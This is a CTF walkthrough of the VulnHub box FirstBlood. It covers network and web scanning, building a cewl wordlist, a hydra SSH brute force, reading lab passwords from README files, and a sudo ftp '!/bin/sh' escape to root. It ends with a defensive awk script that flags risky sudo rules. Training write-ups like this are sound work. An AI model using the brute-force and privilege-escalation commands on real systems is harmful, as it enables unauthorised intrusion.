vulnhub-FirstBlood
2022-07-05 15:53:00 【GALi_ two hundred and thirty-three】
Description
A VERY beginner friendly box with a LOT of hand holding.
Once the system grabs an IP, head straight to the web port before scanning.
You will find your first set of instructions which starts the guided process.
Created in Virtualbox.
Goal: Get the root flag.
Your feedback is appreciated – Twitter: @iamv1nc3nt
This is a beginner target that teaches you how to penetrate a machine; each step comes with a corresponding hint.
Walkthrough
Get the target's IP address
sudo arp-scan -I eth0 -l

The target's IP is 10.0.2.20
Go directly to the web page

View the page source

Follow the prompts to visit rambo.html

Run a port scan with nmap
nmap -p- 10.0.2.20

Port 60022 is found open
Scan the web directories
nikto -h http://10.0.2.20/

This finds another website directory, /johnnyrambo/; open it in the browser

Next is SSH brute forcing; use cewl to crawl the website and generate a wordlist
cewl -w words.txt -d 1 -m 5 http://10.0.2.20/johnnyrambo/
Count the number of lines
wc -l words.txt
137 words.txt
Visit ssh.html

Crack johnny's password
hydra -l johnny -P words.txt -v 10.0.2.20 ssh -s 60022 -t 4

The crack succeeds; log in to the system via ssh
ssh johnny@10.0.2.20 -p 60022
After logging in, open README.txt in the current directory

As the hint suggests, you can use the following command to find the local web directory
cat /etc/nginx/sites-enabled/default | grep -v "#"

Go into /var/www/html/ and find another README.txt

Search for README.txt files
find / -type f -readable 2>/dev/null | grep README.txt
# 2>/dev/null: 2 is standard error, so this redirects standard error to /dev/null

View /opt/README.txt

This gives an account and password
username: blood
password: HackThePlanet2020!!
Switch user
su - blood

Login succeeds. The README.txt in the blood user's home directory says that there may be some files in other users' folders under /home

The sly user's folder contains two files, but only one is readable; permissions are insufficient.
Use sudo -l to view the current user's permissions
sudo -l

The blood user can run /bin/cat through sudo; use it to view /home/sly/README.txt
sudo -u sly /bin/cat /home/sly/README.txt

This gives the sly user's password: SylvesterStalone
Switch to the sly user
View the user's permissions
sly@firstblood:~$ sudo -l
Matching Defaults entries for sly on firstblood:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User sly may run the following commands on firstblood:
(ALL) /usr/bin/ftp
(root) NOPASSWD: /usr/bin/esudo-properties
Using sudo, ftp can be run with root privileges.
The GTFOBins website lists the method for obtaining root privileges

sly@firstblood:~$ sudo ftp
[sudo] password for sly:
ftp> !/bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)
#
OK. Root privileges obtained successfully.
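
Seen from the defender's side, the sudo rules above are the misconfiguration that the box teaches. The script below is an added example, not part of the original walkthrough: it audits `sudo -l` output and flags rules for binaries that can escape to a shell or read arbitrary files. The function names and the two-entry risk table are assumptions made for illustration; the sample input is the sly output shown above.

```sh
#!/bin/sh
# Added example: audit `sudo -l` output read from stdin.
# The risk table is a small constructed subset, not the full GTFOBins list.
audit_sudo_l() {
    awk '
    BEGIN {
        risk["ftp"] = "shell escape: the ! command runs a shell as the sudo target user"
        risk["cat"] = "reads any file the sudo target user can read"
    }
    # Rules start after the "may run the following commands" header.
    /may run the following commands/ { in_rules = 1; next }
    in_rules && match($0, /\([^)]*\)/) {
        runas  = substr($0, RSTART + 1, RLENGTH - 2)
        rest   = substr($0, RSTART + RLENGTH)
        nopass = (rest ~ /NOPASSWD:/) ? "no password" : "password required"
        gsub(/[A-Z_]+:/, "", rest)      # drop tags such as NOPASSWD: or SETENV:
        n = split(rest, cmds, ",")      # one rule line may list several commands
        for (i = 1; i <= n; i++) {
            if (split(cmds[i], w, " ") == 0) continue
            m = split(w[1], parts, "/")
            name = parts[m]             # basename of the allowed command
            if (name in risk)
                printf "RISK %s as (%s), %s: %s\n", w[1], runas, nopass, risk[name]
            else
                printf "REVIEW %s as (%s), %s: not in table, inspect manually\n", w[1], runas, nopass
        }
    }'
}

# Sample input: the sudo -l output for sly shown in the walkthrough above.
sample_sudo_l() {
    cat <<'EOF'
Matching Defaults entries for sly on firstblood:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User sly may run the following commands on firstblood:
    (ALL) /usr/bin/ftp
    (root) NOPASSWD: /usr/bin/esudo-properties
EOF
}

sample_sudo_l | audit_sudo_l
```

On a real host, pipe `sudo -l -U <user>` (run as root) into `audit_sudo_l` for each account and remove or tighten every rule it marks RISK.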
